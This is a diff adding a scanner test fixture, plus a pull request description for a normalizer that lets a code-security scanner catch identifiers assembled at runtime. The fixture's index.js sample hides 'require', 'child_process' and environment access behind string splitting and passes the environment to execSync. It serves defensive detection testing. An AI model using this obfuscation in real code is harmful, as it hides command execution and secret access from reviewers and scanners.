+      "path": "package.json",
+      "size": 54,
+      "sha256": "staged-package-json",
+      "flags": [],
+      "textSample": "{\"name\":\"assembled-identifier-exfil\",\"version\":\"1.0.1\"}"
+    },
+    {
+      "path": "index.js",
+      "size": 200,
+      "sha256": "index-js",
+      "flags": [],
+      "textSample": "const r = globalThis['re' + 'quire'];\nconst cp = r(['chi','ld_pro','cess'].join(''));\nconst data = globalThis['proc' + 'ess']['e' + 'nv'];\ncp['exec' + 'Sync']('echo ' + data);\n"
+    }
+  ],
+  "expectedRisk": "high",
+  "expectedFindings": [
+    {
+      "ruleId": "code.process-execution",
+      "severity": "high",
+      "file": "index.js"
+    },
+    {
+      "ruleId": "code.credential-access",
+      "severity": "high",
+      "file": "index.js"
+    }
+  ]
+}


### PR DESCRIPTION
Closes #192. The deterministic code scanner is literal-regex based, so identifiers assembled at runtime (`['chi','ld_pro','cess'].join('')`, `'re'+'quire'`, `globalThis['proc'+'ess']`) evaded it entirely. This adds a tokenizer-based constant-folding pre-pass (`server/lib/review-rules/normalize.ts`) that folds string-concat chains, `[...].join('')` array assembly, and literal-keyed computed member access back to literal form before the `code.*` rules run — keeping folding out of comments, strings, templates, and regex literals, scanning both raw and folded text so detections can only be added, and folding single-line spans only so line numbers stay exact. It closes the assembled-identifier frontier miss (frontier recall 0%→100%) and restores `splitStringLiterals` code retention 80%→100%, bumps `DETERMINISTIC_RULES_VERSION` to 1.7.0, and is JavaScript-only (Python is pass-through). Adds normalizer unit tests, a gated frontier regression, and a golden corpus case; full `verify` (lint, format, typecheck, 566 tests) passes.

🤖 Generated with [Claude Code](https://claude.com/claude-code)